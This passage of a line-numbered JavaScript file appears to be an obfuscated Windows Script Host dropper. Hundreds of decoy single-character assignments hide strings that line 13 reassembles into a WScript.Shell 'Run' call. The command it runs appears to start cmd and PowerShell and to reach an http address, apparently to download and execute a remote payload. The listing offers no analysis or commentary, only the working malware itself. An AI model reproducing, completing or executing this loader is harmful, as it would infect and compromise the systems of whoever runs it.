13 | this[etkott + oqivgdri + wieuok + lspibjvou + clriavgp + wkaxbe + isojia][unlshe + lspibjvou + vmjomwr + mzipsg + isojia + vmjomwr + ptthwdwtl + viapicp + sxwom + vmjomwr + wieuok + isojia] ( etkott + oqivgdri + wieuok + lspibjvou + clriavgp + wkaxbe + isojia + rsolbz + oqivgdri + dvrmhvbv + vmjomwr + sjkxsh + sjkxsh ) [lspibjvou + oujhidztt + tyqkihhxx] ( wieuok + itgfeo + dycuqmky + gtwctc + otmegnvyz + wieuok + gtwctc + wkaxbe + skcfbmcd + pzigzedtr + vmjomwr + lspibjvou + oiuqjba + dvrmhvbv + vmjomwr + sjkxsh + sjkxsh + rsolbz + vmjomwr + vffbzjg + vmjomwr + gtwctc + ixodbzpw + unlshe + skcfbmcd + itgfeo + itgfeo + mzipsg + tyqkihhxx + dycuqmky + gtwctc + ithgttb + gzvvne + tyqkihhxx + uyovujnr + skcfbmcd + xqwrrka + vmjomwr + ixodbzpw + etkott + vmjomwr + viapicp + ajhnjw + vmjomwr + mlxbxu + oujhidztt + vmjomwr + oiuqjba + isojia + gtwctc + ixodbzpw + ptthwdwtl + oujhidztt + isojia + ivkmsjr + clriavgp + sjkxsh + vmjomwr + gtwctc + folmzwp + isojia + vmjomwr + itgfeo + wkaxbe + folmzwp + caqtah + clriavgp + tyqkihhxx + uyovujnr + skcfbmcd + clriavgp + wieuok + vmjomwr + rsolbz + wkaxbe + dycuqmky + jpwpf + gtwctc + dvrmhvbv + isojia + isojia + wkaxbe + mgfzruq + otmegnvyz + otmegnvyz + rxwpnxoff + gnwvl + azdrncz + rsolbz + rxwpnxoff + outdqpl + azdrncz + rsolbz + rxwpnxoff + rsolbz + gjzkeblkh + kskux + jaonxyc + otmegnvyz + clriavgp + tyqkihhxx + uyovujnr + skcfbmcd + clriavgp + wieuok + vmjomwr + rsolbz + wkaxbe + dvrmhvbv + wkaxbe + ithgttb + dbkztimsh + dbkztimsh + oiuqjba + isojia + mzipsg + lspibjvou + isojia + gtwctc + folmzwp + isojia + vmjomwr + itgfeo + wkaxbe + folmzwp + caqtah + clriavgp + tyqkihhxx + uyovujnr + skcfbmcd + clriavgp + wieuok + vmjomwr + rsolbz + wkaxbe + dycuqmky + jpwpf + dbkztimsh + dbkztimsh + wieuok + itgfeo + dycuqmky + gtwctc + otmegnvyz + wieuok + gtwctc + tyqkihhxx + vmjomwr + isojia + gtwctc + oujhidztt + oiuqjba + vmjomwr + gtwctc + caqtah + caqtah + rxwpnxoff + gnwvl + azdrncz + rsolbz + rxwpnxoff + outdqpl + azdrncz + rsolbz + rxwpnxoff + rsolbz + gjzkeblkh + kskux + jaonxyc + nlumr + qlfijdv + qlfijdv + qlfijdv + qlfijdv + caqtah + dycuqmky + mzipsg + uyovujnr + pzigzedtr + pzigzedtr + pzigzedtr + lspibjvou + skcfbmcd + skcfbmcd + isojia + caqtah + dbkztimsh + dbkztimsh + wieuok + itgfeo + dycuqmky + gtwctc + otmegnvyz + wieuok + gtwctc + lspibjvou + vmjomwr + mubqqobc + oiuqjba + uyovujnr + lspibjvou + azdrncz + gjzkeblkh + gtwctc + otmegnvyz + oiuqjba + gtwctc + caqtah + caqtah + rxwpnxoff + gnwvl + azdrncz + rsolbz + rxwpnxoff + outdqpl + azdrncz + rsolbz + rxwpnxoff + rsolbz + gjzkeblkh + kskux + jaonxyc + nlumr + qlfijdv + qlfijdv + qlfijdv + qlfijdv + caqtah + dycuqmky + mzipsg + uyovujnr + pzigzedtr + pzigzedtr + pzigzedtr + lspibjvou + skcfbmcd + skcfbmcd + isojia + caqtah + gjzkeblkh + outdqpl + pszwerlx + qlfijdv + qlfijdv + azdrncz + azdrncz + qlfijdv + qlfijdv + gjzkeblkh + jaonxyc + pszwerlx + rxwpnxoff + gjzkeblkh + rsolbz + dycuqmky + sjkxsh + sjkxsh, 0, false ); |
|
14 | } | |
15 | gzvvne = "q"; | |
16 | gzvvne = "B"; | |
17 | gzvvne = "L"; | |
18 | gzvvne = "m"; | |
19 | gzvvne = "P"; | |
20 | gzvvne = "g"; | |
21 | gzvvne = "u"; | |
22 | gzvvne = "F"; | |
23 | gzvvne = "y"; | |
24 | gzvvne = "V"; | |
25 | gzvvne = "U"; | |
26 | gzvvne = "l"; | |
27 | gzvvne = "P"; | |
28 | gzvvne = "K"; | |
29 | gzvvne = "Y"; | |
30 | gzvvne = "z"; | |
31 | gzvvne = "z"; | |
32 | gzvvne = "G"; | |
33 | gzvvne = "q"; | |
34 | gzvvne = "p"; | |
35 | gzvvne = "s"; | |
36 | gzvvne = "p"; | |
37 | gzvvne = "s"; | |
38 | gzvvne = "K"; | |
39 | gzvvne = "b"; | |
40 | gzvvne = "S"; | |
41 | gzvvne = "Z"; | |
42 | gzvvne = "Q"; | |
43 | gzvvne = "F"; | |
44 | gzvvne = "A"; | |
45 | gzvvne = "b"; | |
46 | gzvvne = "Y"; | |
47 | gzvvne = "C"; | |
48 | gzvvne = "C"; | |
49 | gzvvne = "Z"; | |
50 | gzvvne = "R"; | |
51 | gzvvne = "n"; | |
52 | gzvvne = "T"; | |
53 | gzvvne = "I"; | |
54 | wkaxbe = "p"; | |
55 | byhhwxwas = "F"; | |
56 | byhhwxwas = "H"; | |
57 | byhhwxwas = "N"; | |
58 | byhhwxwas = "s"; | |
59 | byhhwxwas = "w"; | |
60 | byhhwxwas = "F"; | |
61 | byhhwxwas = "R"; | |
62 | byhhwxwas = "q"; | |
63 | byhhwxwas = "N"; | |
64 | byhhwxwas = "R"; | |
65 | byhhwxwas = "t"; | |
66 | byhhwxwas = "c"; | |
67 | byhhwxwas = "k"; | |
68 | byhhwxwas = "O"; | |
69 | byhhwxwas = "y"; | |
70 | byhhwxwas = "o"; | |
71 | byhhwxwas = "p"; | |
72 | byhhwxwas = "h"; | |
73 | byhhwxwas = "e"; | |
74 | byhhwxwas = "k"; | |
75 | byhhwxwas = "k"; | |
76 | byhhwxwas = "h"; | |
77 | byhhwxwas = "N"; | |
78 | byhhwxwas = "V"; | |
79 | byhhwxwas = "V"; | |
80 | byhhwxwas = "c"; | |
81 | byhhwxwas = "H"; | |
82 | byhhwxwas = "p"; | |
83 | byhhwxwas = "t"; | |
84 | byhhwxwas = "B"; | |
85 | byhhwxwas = "I"; | |
86 | byhhwxwas = "w"; | |
87 | byhhwxwas = "J"; | |
88 | byhhwxwas = "f"; | |
89 | byhhwxwas = "n"; | |
90 | byhhwxwas = "L"; | |
91 | xqwrrka = "d"; | |
92 | xqwrrka = "r"; | |
93 | xqwrrka = "b"; | |
94 | xqwrrka = "e"; | |
95 | xqwrrka = "i"; | |
96 | xqwrrka = "L"; | |
97 | xqwrrka = "g"; | |
98 | xqwrrka = "n"; | |
99 | xqwrrka = "l"; | |
100 | xqwrrka = "M"; | |
101 | xqwrrka = "V"; | |
102 | xqwrrka = "k"; | |
103 | wieuok = "M"; | |
104 | wieuok = "c"; | |
105 | wieuok = "b"; | |
106 | wieuok = "s"; | |
107 | wieuok = "X"; | |
108 | wieuok = "W"; | |
109 | wieuok = "m"; | |
110 | wieuok = "G"; | |
111 | wieuok = "c"; | |
112 | wieuok = "f"; | |
113 | wieuok = "P"; | |
114 | wieuok = "z"; | |
115 | wieuok = "Q"; | |
116 | wieuok = "E"; | |
117 | wieuok = "b"; | |
118 | wieuok = "I"; | |
119 | wieuok = "k"; | |
120 | wieuok = "r"; | |
121 | wieuok = "c"; | |
122 | outdqpl = "D"; | |
123 | outdqpl = "n"; | |
124 | outdqpl = "Q"; | |
125 | outdqpl = "S"; | |
126 | outdqpl = "y"; | |
127 | outdqpl = "T"; | |
128 | outdqpl = "g"; | |
129 | outdqpl = "G"; | |
130 | outdqpl = "y"; | |
131 | outdqpl = "Z"; | |
132 | outdqpl = "v"; | |
133 | outdqpl = "v"; | |
134 | outdqpl = "m"; | |
135 | outdqpl = "4"; | |
136 | mubqqobc = "s"; | |
137 | mubqqobc = "f"; | |
138 | mubqqobc = "A"; | |
139 | mubqqobc = "i"; | |
140 | mubqqobc = "q"; | |
141 | mubqqobc = "P"; | |
142 | mubqqobc = "u"; | |
143 | mubqqobc = "s"; | |
144 | mubqqobc = "g"; | |
145 | lspibjvou = "a"; | |
146 | lspibjvou = "S"; | |
147 | lspibjvou = "r"; | |
148 | gnwvl = "f"; | |
149 | gnwvl = "T"; | |
150 | gnwvl = "V"; | |
151 | gnwvl = "x"; | |
152 | gnwvl = "j"; | |
153 | gnwvl = "x"; | |
154 | gnwvl = "S"; | |
155 | gnwvl = "s"; | |
156 | gnwvl = "m"; | |
157 | gnwvl = "b"; | |
158 | gnwvl = "n"; | |
159 | gnwvl = "y"; | |
160 | gnwvl = "T"; | |
161 | gnwvl = "H"; | |
162 | gnwvl = "Q"; | |
163 | gnwvl = "b"; | |
164 | gnwvl = "x"; | |
165 | gnwvl = "h"; | |
166 | gnwvl = "e"; | |
167 | gnwvl = "W"; | |
168 | gnwvl = "m"; | |
169 | gnwvl = "s"; | |
170 | gnwvl = "y"; | |
171 | gnwvl = "A"; | |
172 | gnwvl = "U"; | |
173 | gnwvl = "h"; | |
174 | gnwvl = "h"; | |
175 | gnwvl = "H"; | |
176 | gnwvl = "N"; | |
177 | gnwvl = "9"; | |
178 | oujhidztt = "S"; | |
179 | oujhidztt = "T"; | |
180 | oujhidztt = "N"; | |
181 | oujhidztt = "T"; | |
182 | oujhidztt = "x"; | |
183 | oujhidztt = "z"; | |
184 | oujhidztt = "z"; | |
185 | oujhidztt = "W"; | |
186 | oujhidztt = "K"; | |
187 | oujhidztt = "y"; | |
188 | oujhidztt = "c"; | |
189 | oujhidztt = "b"; | |
190 | oujhidztt = "N"; | |
191 | oujhidztt = "s"; | |
192 | oujhidztt = "l"; | |
193 | oujhidztt = "a"; | |
194 | oujhidztt = "M"; | |
195 | oujhidztt = "t"; | |
196 | oujhidztt = "k"; | |
197 | oujhidztt = "E"; | |
198 | oujhidztt = "O"; | |
199 | oujhidztt = "N"; | |
200 | oujhidztt = "t"; | |
201 | oujhidztt = "h"; | |
202 | oujhidztt = "C"; | |
203 | oujhidztt = "e"; | |
204 | oujhidztt = "N"; | |
205 | oujhidztt = "R"; | |
206 | oujhidztt = "P"; | |
207 | oujhidztt = "B"; | |
208 | oujhidztt = "q"; | |
209 | oujhidztt = "h"; | |
210 | oujhidztt = "C"; | |
211 | oujhidztt = "J"; | |
212 | oujhidztt = "R"; | |
213 | oujhidztt = "S"; | |
214 | oujhidztt = "o"; | |
215 | oujhidztt = "b"; | |
216 | oujhidztt = "m"; | |
217 | oujhidztt = "F"; | |
218 | oujhidztt = "f"; | |
219 | oujhidztt = "e"; | |
220 | oujhidztt = "u"; | |
221 | isojia = "L"; | |
222 | isojia = "D"; | |
223 | isojia = "C"; | |
224 | isojia = "m"; | |
225 | isojia = "z"; | |
226 | isojia = "S"; | |
227 | isojia = "x"; | |
228 | isojia = "F"; | |
229 | isojia = "S"; | |
230 | isojia = "m"; | |
231 | isojia = "j"; | |
232 | isojia = "r"; | |
233 | isojia = "i"; | |
234 | isojia = "F"; | |
235 | isojia = "d"; | |
236 | isojia = "v"; | |
237 | isojia = "h"; | |
238 | isojia = "b"; | |
239 | isojia = "y"; | |
240 | isojia = "t"; | |
241 | isojia = "z"; | |
242 | isojia = "O"; | |
243 | isojia = "a"; | |
244 | isojia = "Q"; | |
245 | isojia = "F"; | |
246 | isojia = "k"; | |
247 | isojia = "m"; | |
248 | isojia = "Y"; | |
249 | isojia = "g"; | |
250 | isojia = "t"; | |
251 | itgfeo = "f"; | |
252 | itgfeo = "X"; | |
253 | itgfeo = "j"; | |
254 | itgfeo = "q"; | |
255 | itgfeo = "G"; | |
256 | itgfeo = "I"; | |
257 | itgfeo = "u"; | |
258 | itgfeo = "e"; | |
259 | itgfeo = "v"; | |
260 | itgfeo = "i"; | |
261 | itgfeo = "g"; | |
262 | itgfeo = "c"; | |
263 | itgfeo = "M"; | |
264 | itgfeo = "q"; | |
265 | itgfeo = "Y"; | |
266 | itgfeo = "Y"; | |
267 | itgfeo = "M"; | |
268 | itgfeo = "V"; | |
269 | itgfeo = "E"; | |
270 | itgfeo = "s"; | |
271 | itgfeo = "L"; | |
272 | itgfeo = "t"; | |
273 | itgfeo = "H"; | |
274 | itgfeo = "N"; | |
275 | itgfeo = "J"; | |
276 | itgfeo = "i"; | |
277 | itgfeo = "y"; | |
278 | itgfeo = "m"; | |
279 | uyqsa = "T"; | |
280 | uyqsa = "i"; | |
281 | uyqsa = "j"; | |
282 | uyqsa = "e"; | |
283 | uyqsa = "v"; | |
284 | uyqsa = "S"; | |
285 | uyqsa = "C"; | |
286 | uyqsa = "H"; | |
287 | uyqsa = "l"; | |
288 | uyqsa = "n"; | |
289 | uyqsa = "t"; | |
290 | uyqsa = "e"; | |
291 | uyqsa = "K"; | |
292 | uyqsa = "L"; | |
293 | uyqsa = "V"; | |
294 | uyqsa = "S"; | |
295 | uyqsa = "k"; | |
296 | uyqsa = "C"; | |
297 | uyqsa = "R"; | |
298 | uyqsa = "K"; | |
299 | uyqsa = "v"; | |
300 | uyqsa = "N"; | |
301 | otmegnvyz = "w"; | |
302 | otmegnvyz = "G"; | |
303 | otmegnvyz = "o"; | |
304 | otmegnvyz = "j"; | |
305 | otmegnvyz = "m"; | |
306 | otmegnvyz = "m"; | |
307 | otmegnvyz = "F"; | |
308 | otmegnvyz = "D"; | |
309 | otmegnvyz = "t"; | |
310 | otmegnvyz = "y"; | |
311 | otmegnvyz = "w"; | |
312 | otmegnvyz = "z"; | |
313 | otmegnvyz = "R"; | |
314 | otmegnvyz = "n"; | |
315 | otmegnvyz = "Z"; | |
316 | otmegnvyz = "q"; | |
317 | otmegnvyz = "b"; | |
318 | otmegnvyz = "L"; | |
319 | otmegnvyz = "u"; | |
320 | otmegnvyz = "L"; | |
321 | otmegnvyz = "L"; | |
322 | otmegnvyz = "V"; | |
323 | otmegnvyz = "d"; | |
324 | otmegnvyz = "R"; | |
325 | otmegnvyz = "V"; | |
326 | otmegnvyz = "P"; | |
327 | otmegnvyz = "i"; | |
328 | otmegnvyz = "Z"; | |
329 | otmegnvyz = "h"; | |
330 | otmegnvyz = "w"; | |
331 | otmegnvyz = "M"; | |
332 | otmegnvyz = "J"; | |
333 | otmegnvyz = "s"; | |
334 | otmegnvyz = "o"; | |
335 | otmegnvyz = "e"; | |
336 | otmegnvyz = "L"; | |
337 | otmegnvyz = "t"; | |
338 | otmegnvyz = "/"; | |
339 | etkott = "K"; | |
340 | etkott = "Y"; | |
341 | etkott = "f"; | |
342 | etkott = "W"; | |
343 | clriavgp = "o"; | |
344 | clriavgp = "U"; | |
345 | clriavgp = "i"; | |
346 | gjzkeblkh = "T"; | |
347 | gjzkeblkh = "M"; | |
348 | gjzkeblkh = "f"; | |
349 | gjzkeblkh = "u"; | |
350 | gjzkeblkh = "D"; | |
351 | gjzkeblkh = "J"; | |
352 | gjzkeblkh = "f"; | |
353 | gjzkeblkh = "N"; | |
354 | gjzkeblkh = "k"; | |
355 | gjzkeblkh = "f"; | |
356 | gjzkeblkh = "T"; | |
357 | gjzkeblkh = "J"; | |
358 | gjzkeblkh = "W"; | |
359 | gjzkeblkh = "C"; | |
360 | gjzkeblkh = "V"; | |
361 | gjzkeblkh = "d"; | |
362 | gjzkeblkh = "s"; | |
363 | gjzkeblkh = "U"; | |
364 | gjzkeblkh = "h"; | |
365 | gjzkeblkh = "H"; | |
366 | gjzkeblkh = "Q"; | |
367 | gjzkeblkh = "2"; | |
368 | uginrrjf = "J"; | |
369 | uginrrjf = "J"; | |
370 | uginrrjf = "F"; | |
371 | uginrrjf = "I"; | |
372 | uginrrjf = "Y"; | |
373 | uginrrjf = "I"; | |
374 | uginrrjf = "D"; | |
375 | uginrrjf = "B"; | |
376 | uginrrjf = "z"; | |
377 | uginrrjf = "N"; | |
378 | uginrrjf = "X"; | |
379 | uginrrjf = "O"; | |
380 | uginrrjf = "M"; | |
381 | uginrrjf = "B"; | |
382 | uginrrjf = "o"; | |
383 | uginrrjf = "X"; | |
384 | uginrrjf = "a"; | |
385 | uginrrjf = "Z"; | |
386 | uginrrjf = "s"; | |
387 | uginrrjf = "W"; | |
388 | uginrrjf = "J"; | |
389 | uginrrjf = "d"; | |
390 | uginrrjf = "O"; | |
391 | uginrrjf = "w"; | |
392 | uginrrjf = "S"; | |
393 | uginrrjf = "q"; | |
394 | uginrrjf = "s"; | |
395 | uginrrjf = "z"; | |
396 | uginrrjf = "S"; | |
397 | uginrrjf = "Y"; | |
398 | uginrrjf = "Q"; | |
399 | jpwpf = "z"; | |
400 | jpwpf = "X"; | |
401 | jpwpf = "F"; | |
402 | jpwpf = "F"; | |
403 | jpwpf = "Q"; | |
404 | jpwpf = "t"; | |
405 | jpwpf = "p"; | |
406 | jpwpf = "q"; | |
407 | jpwpf = "O"; | |
408 | jpwpf = "b"; | |
409 | jpwpf = "n"; | |
410 | jpwpf = "e"; | |
411 | jpwpf = "r"; | |
412 | jpwpf = "v"; | |
413 | jpwpf = "b"; | |
414 | jpwpf = "O"; | |
415 | jpwpf = "s"; | |
416 | jpwpf = "A"; | |
417 | jpwpf = "l"; | |
418 | jpwpf = "L"; | |
419 | jpwpf = "I"; | |
420 | jpwpf = "w"; | |
421 | jpwpf = "U"; | |
422 | jpwpf = "L"; | |
423 | jpwpf = "L"; | |
424 | jpwpf = "v"; | |
425 | jpwpf = "E"; | |
426 | jpwpf = "N"; | |
427 | jpwpf = "T"; | |
428 | jpwpf = "w"; | |
429 | jpwpf = "J"; | |
430 | jpwpf = "p"; | |
431 | jpwpf = "v"; | |
432 | jpwpf = "K"; | |
433 | jpwpf = "v"; | |
434 | jpwpf = "P"; | |
435 | jpwpf = "J"; | |
436 | jpwpf = "K"; | |
437 | jpwpf = "b"; | |
438 | jpwpf = "y"; | |
439 | jpwpf = "O"; | |
440 | jpwpf = "R"; | |
441 | jpwpf = "j"; | |
442 | jpwpf = "f"; | |
443 | viapicp = "b"; | |
444 | viapicp = "B"; | |
445 | viapicp = "p"; | |
446 | viapicp = "b"; | |
447 | gtwctc = "S"; | |
448 | gtwctc = "G"; | |
449 | gtwctc = "q"; | |
450 | gtwctc = "G"; | |
451 | gtwctc = "G"; | |
452 | gtwctc = "I"; | |
453 | gtwctc = "I"; | |
454 | gtwctc = "f"; | |
455 | gtwctc = "n"; | |
456 | gtwctc = "D"; | |
457 | gtwctc = " "; | |
458 | sxwom = "T"; | |
459 | sxwom = "i"; | |
460 | sxwom = "g"; | |
461 | sxwom = "O"; | |
462 | sxwom = "K"; | |
463 | sxwom = "y"; | |
464 | sxwom = "x"; | |
465 | sxwom = "j"; | |
466 | azdrncz = "G"; | |
467 | azdrncz = "c"; | |
468 | azdrncz = "j"; | |
469 | azdrncz = "p"; | |
470 | azdrncz = "z"; | |
471 | azdrncz = "F"; | |
472 | azdrncz = "J"; | |
473 | azdrncz = "d"; | |
474 | azdrncz = "u"; | |
475 | azdrncz = "q"; | |
476 | azdrncz = "g"; | |
477 | azdrncz = "H"; | |
478 | azdrncz = "O"; | |
479 | azdrncz = "o"; | |
480 | azdrncz = "n"; | |
481 | azdrncz = "h"; | |
482 | azdrncz = "j"; | |
483 | azdrncz = "L"; | |
484 | azdrncz = "d"; | |
485 | azdrncz = "v"; | |
486 | azdrncz = "m"; | |
487 | azdrncz = "s"; | |
488 | azdrncz = "a"; | |
489 | azdrncz = "W"; | |
490 | azdrncz = "o"; | |
491 | azdrncz = "I"; | |
492 | azdrncz = "t"; | |
493 | azdrncz = "r"; | |
494 | azdrncz = "b"; | |
495 | azdrncz = "D"; | |
496 | azdrncz = "N"; | |
497 | azdrncz = "k"; | |
498 | azdrncz = "x"; | |
499 | azdrncz = "n"; | |
500 | azdrncz = "k"; | |
501 | azdrncz = "u"; | |
502 | azdrncz = "G"; | |
503 | azdrncz = "H"; | |
504 | azdrncz = "f"; | |
505 | azdrncz = "R"; | |
506 | azdrncz = "E"; | |
507 | azdrncz = "B"; | |
508 | azdrncz = "p"; | |
509 | azdrncz = "3"; | |
510 | teckteq = "u"; | |
511 | teckteq = "P"; | |
512 | teckteq = "W"; | |
513 | teckteq = "S"; | |
514 | teckteq = "j"; | |
515 | teckteq = "J"; | |
516 | teckteq = "u"; | |
517 | teckteq = "R"; | |
518 | teckteq = "i"; | |
519 | teckteq = "w"; | |
520 | teckteq = "c"; | |
521 | teckteq = "g"; | |
522 | teckteq = "V"; | |
523 | teckteq = "K"; | |
524 | teckteq = "M"; | |
525 | teckteq = "s"; | |
526 | teckteq = "h"; | |
527 | teckteq = "C"; | |
528 | teckteq = "M"; | |
529 | teckteq = "Y"; | |
530 | mgfzruq = ":"; | |
531 | oqivgdri = "d"; | |
532 | oqivgdri = "i"; | |
533 | oqivgdri = "E"; | |
534 | oqivgdri = "v"; | |
535 | oqivgdri = "W"; | |
536 | oqivgdri = "B"; | |
537 | oqivgdri = "R"; | |
538 | oqivgdri = "e"; | |
539 | oqivgdri = "s"; | |
540 | oqivgdri = "a"; | |
541 | oqivgdri = "j"; | |
542 | oqivgdri = "R"; | |
543 | oqivgdri = "y"; | |
544 | oqivgdri = "a"; | |
545 | oqivgdri = "P"; | |
546 | oqivgdri = "o"; | |
547 | oqivgdri = "I"; | |
548 | oqivgdri = "T"; | |
549 | oqivgdri = "y"; | |
550 | oqivgdri = "y"; | |
551 | oqivgdri = "j"; | |
552 | oqivgdri = "f"; | |
553 | oqivgdri = "u"; | |
554 | oqivgdri = "L"; | |
555 | oqivgdri = "J"; | |
556 | oqivgdri = "m"; | |
557 | oqivgdri = "M"; | |
558 | oqivgdri = "O"; | |
559 | oqivgdri = "P"; | |
560 | oqivgdri = "G"; | |
561 | oqivgdri = "c"; | |
562 | oqivgdri = "j"; | |
563 | oqivgdri = "S"; | |
564 | folmzwp = "E"; | |
565 | folmzwp = "Z"; | |
566 | folmzwp = "H"; | |
567 | folmzwp = "W"; | |
568 | folmzwp = "V"; | |
569 | folmzwp = "q"; | |
570 | folmzwp = "F"; | |
571 | folmzwp = "r"; | |
572 | folmzwp = "a"; | |
573 | folmzwp = "X"; | |
574 | folmzwp = "%"; | |
575 | ajhnjw = "l"; | |
576 | ajhnjw = "D"; | |
577 | ajhnjw = "c"; | |
578 | ajhnjw = "E"; | |
579 | ajhnjw = "m"; | |
580 | ajhnjw = "S"; | |
581 | ajhnjw = "S"; | |
582 | ajhnjw = "c"; | |
583 | ajhnjw = "g"; | |
584 | ajhnjw = "T"; | |
585 | ajhnjw = "h"; | |
586 | ajhnjw = "Q"; | |
587 | ajhnjw = "F"; | |
588 | ajhnjw = "o"; | |
589 | ajhnjw = "t"; | |
590 | ajhnjw = "G"; | |
591 | ajhnjw = "x"; | |
592 | ajhnjw = "m"; | |
593 | ajhnjw = "N"; | |
594 | ajhnjw = "c"; | |
595 | ajhnjw = "C"; | |
596 | ajhnjw = "R"; | |
597 | tdxws = "z"; | |
598 | tdxws = "a"; | |
599 | tdxws = "v"; | |
600 | tdxws = "e"; | |
601 | tdxws = "H"; | |
602 | tdxws = "I"; | |
603 | tdxws = "O"; | |
604 | tdxws = "D"; | |
605 | tdxws = "M"; | |
606 | tdxws = "Q"; | |
607 | tdxws = "R"; | |
608 | tdxws = "F"; | |
609 | tdxws = "C"; | |
610 | tdxws = "v"; | |
611 | tdxws = "L"; | |
612 | tdxws = "I"; | |
613 | tdxws = "Y"; | |
614 | tdxws = "s"; | |
615 | tdxws = "h"; | |
616 | tdxws = "U"; | |
617 | tdxws = "S"; | |
618 | tdxws = "I"; | |
619 | tdxws = "U"; | |
620 | tdxws = "e"; | |
621 | tdxws = "_"; | |
622 | nlumr = "Y"; | |
623 | nlumr = "M"; | |
624 | nlumr = "J"; | |
625 | nlumr = "t"; | |
626 | nlumr = "B"; | |
627 | nlumr = "g"; | |
628 | nlumr = "D"; | |
629 | nlumr = "x"; | |
630 | nlumr = "z"; | |
631 | nlumr = "Y"; | |
632 | nlumr = "@"; | |
633 | ixodbzpw = "O"; | |
634 | ixodbzpw = "o"; | |
635 | ixodbzpw = "j"; | |
636 | ixodbzpw = "q"; | |
637 | ixodbzpw = "n"; | |
638 | ixodbzpw = "z"; | |
639 | ixodbzpw = "l"; | |
640 | ixodbzpw = "u"; | |
641 | ixodbzpw = "W"; | |
642 | ixodbzpw = "m"; | |
643 | ixodbzpw = "E"; | |
644 | ixodbzpw = "J"; | |
645 | ixodbzpw = "I"; | |
646 | ixodbzpw = "L"; | |
647 | ixodbzpw = "n"; | |
648 | ixodbzpw = "J"; | |
649 | ixodbzpw = "R"; | |
650 | ixodbzpw = "V"; | |
651 | ixodbzpw = "w"; | |
652 | ixodbzpw = "T"; | |
653 | ixodbzpw = "r"; | |
654 | ixodbzpw = "A"; | |
655 | ixodbzpw = "Z"; | |
656 | ixodbzpw = "T"; | |
657 | ixodbzpw = "M"; | |
658 | ixodbzpw = "F"; | |
659 | ixodbzpw = "R"; | |
660 | ixodbzpw = "q"; | |
661 | ixodbzpw = "x"; | |
662 | ixodbzpw = "S"; | |
663 | ixodbzpw = "S"; | |
664 | ixodbzpw = "L"; | |
665 | ixodbzpw = "F"; | |
666 | ixodbzpw = "N"; | |
667 | ixodbzpw = "h"; | |
668 | ixodbzpw = "y"; | |
669 | ixodbzpw = "e"; | |
670 | ixodbzpw = "H"; | |
671 | ixodbzpw = "M"; | |
672 | ixodbzpw = "j"; | |
673 | ixodbzpw = "u"; | |
674 | ixodbzpw = "o"; | |
675 | ixodbzpw = "-"; | |
676 | dvrmhvbv = "w"; | |
677 | dvrmhvbv = "Z"; | |
678 | dvrmhvbv = "c"; | |
679 | dvrmhvbv = "o"; | |
680 | dvrmhvbv = "w"; | |
681 | dvrmhvbv = "k"; | |
682 | dvrmhvbv = "o"; | |
683 | dvrmhvbv = "z"; | |
684 | dvrmhvbv = "X"; | |
685 | dvrmhvbv = "h"; | |
686 | oiuqjba = "b"; | |
687 | oiuqjba = "s"; | |
688 | oiuqjba = "a"; | |
689 | oiuqjba = "h"; | |
690 | oiuqjba = "h"; | |
691 | oiuqjba = "G"; | |
692 | oiuqjba = "E"; | |
693 | oiuqjba = "n"; | |
694 | oiuqjba = "u"; | |
695 | oiuqjba = "O"; | |
696 | oiuqjba = "h"; | |
697 | oiuqjba = "h"; | |
698 | oiuqjba = "l"; | |
699 | oiuqjba = "o"; | |
700 | oiuqjba = "x"; | |
701 | oiuqjba = "y"; | |
702 | oiuqjba = "f"; | |
703 | oiuqjba = "I"; | |
704 | oiuqjba = "n"; | |
705 | oiuqjba = "d"; | |
706 | oiuqjba = "Z"; | |
707 | oiuqjba = "N"; | |
708 | oiuqjba = "F"; | |
709 | oiuqjba = "S"; | |
710 | oiuqjba = "o"; | |
711 | oiuqjba = "J"; | |
712 | oiuqjba = "e"; | |
713 | oiuqjba = "r"; | |
714 | oiuqjba = "V"; | |
715 | oiuqjba = "B"; | |
716 | oiuqjba = "n"; | |
717 | oiuqjba = "C"; | |
718 | oiuqjba = "S"; | |
719 | oiuqjba = "y"; | |
720 | oiuqjba = "d"; | |
721 | oiuqjba = "d"; | |
722 | oiuqjba = "w"; | |
723 | oiuqjba = "W"; | |
724 | oiuqjba = "u"; | |
725 | oiuqjba = "G"; | |
726 | oiuqjba = "Q"; | |
727 | oiuqjba = "s"; | |
728 | ptthwdwtl = "n"; | |
729 | ptthwdwtl = "a"; | |
730 | ptthwdwtl = "R"; | |
731 | ptthwdwtl = "C"; | |
732 | ptthwdwtl = "l"; | |
733 | ptthwdwtl = "q"; | |
734 | ptthwdwtl = "Q"; | |
735 | ptthwdwtl = "r"; | |
736 | ptthwdwtl = "a"; | |
737 | ptthwdwtl = "d"; | |
738 | ptthwdwtl = "b"; | |
739 | ptthwdwtl = "x"; | |
740 | ptthwdwtl = "w"; | |
741 | ptthwdwtl = "n"; | |
742 | ptthwdwtl = "t"; | |
743 | ptthwdwtl = "v"; | |
744 | ptthwdwtl = "P"; | |
745 | ptthwdwtl = "A"; | |
746 | ptthwdwtl = "W"; | |
747 | ptthwdwtl = "x"; | |
748 | ptthwdwtl = "V"; | |
749 | ptthwdwtl = "f"; | |
750 | ptthwdwtl = "Z"; | |
751 | ptthwdwtl = "J"; | |
752 | ptthwdwtl = "q"; | |
753 | ptthwdwtl = "Z"; | |
754 | ptthwdwtl = "O"; | |
755 | caqtah = "y"; | |
756 | caqtah = "C"; | |
757 | caqtah = "W"; | |
758 | caqtah = "c"; | |
759 | caqtah = "Q"; | |
760 | caqtah = "E"; | |
761 | caqtah = "j"; | |
762 | caqtah = "L"; | |
763 | caqtah = "\\"; | |
764 | tyqkihhxx = "Q"; | |
765 | tyqkihhxx = "i"; | |
766 | tyqkihhxx = "c"; | |
767 | tyqkihhxx = "M"; | |
768 | tyqkihhxx = "I"; | |
769 | tyqkihhxx = "l"; | |
770 | tyqkihhxx = "a"; | |
771 | tyqkihhxx = "y"; | |
772 | tyqkihhxx = "q"; | |
773 | tyqkihhxx = "F"; | |
774 | tyqkihhxx = "H"; | |
775 | tyqkihhxx = "O"; | |
776 | tyqkihhxx = "e"; | |
777 | tyqkihhxx = "Z"; | |
778 | tyqkihhxx = "j"; | |
779 | tyqkihhxx = "V"; | |
780 | tyqkihhxx = "D"; | |
781 | tyqkihhxx = "B"; | |
782 | tyqkihhxx = "U"; | |
783 | tyqkihhxx = "p"; | |
784 | tyqkihhxx = "v"; | |
785 | tyqkihhxx = "L"; | |
786 | tyqkihhxx = "E"; | |
787 | tyqkihhxx = "l"; | |
788 | tyqkihhxx = "j"; | |
789 | tyqkihhxx = "m"; | |
790 | tyqkihhxx = "G"; | |
791 | tyqkihhxx = "l"; | |
792 | tyqkihhxx = "n"; | |
